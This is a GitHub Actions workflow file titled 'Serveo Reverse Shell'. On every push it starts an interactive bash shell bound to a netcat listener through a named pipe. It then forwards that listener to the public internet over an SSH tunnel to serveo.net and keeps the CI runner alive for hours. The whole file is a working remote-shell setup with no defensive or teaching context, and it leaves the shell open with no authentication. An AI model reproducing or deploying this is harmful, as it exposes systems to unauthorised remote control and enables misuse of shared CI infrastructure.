name: Serveo Reverse Shell

on:
  push:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
      - uses: actions/checkout@v4

      - name: Install Dependencies
        run: |
          sudo apt update
          sudo apt install -y openssh-client netcat-openbsd

      - name: Start Reverse Shell and Tunnel with Serveo
        run: |
          echo "=== Starting Reverse Shell (Listening) ==="
          mkfifo /tmp/backpipe
          /bin/bash -i < /tmp/backpipe 2>&1 | nc -lvnp 9001 > /tmp/backpipe &
          sleep 5
          echo "=== Starting Serveo Tunnel ==="
          # Run Serveo in the background and try to forward port 9001
          ssh -R 80:localhost:9001 serveo.net &
          sleep 10
          echo "=== Serveo Tunnel should be active. Check the logs for the forwarding URL. ==="
          # Keep workflow alive
          for i in {1..360}; do
            sleep 60
          done
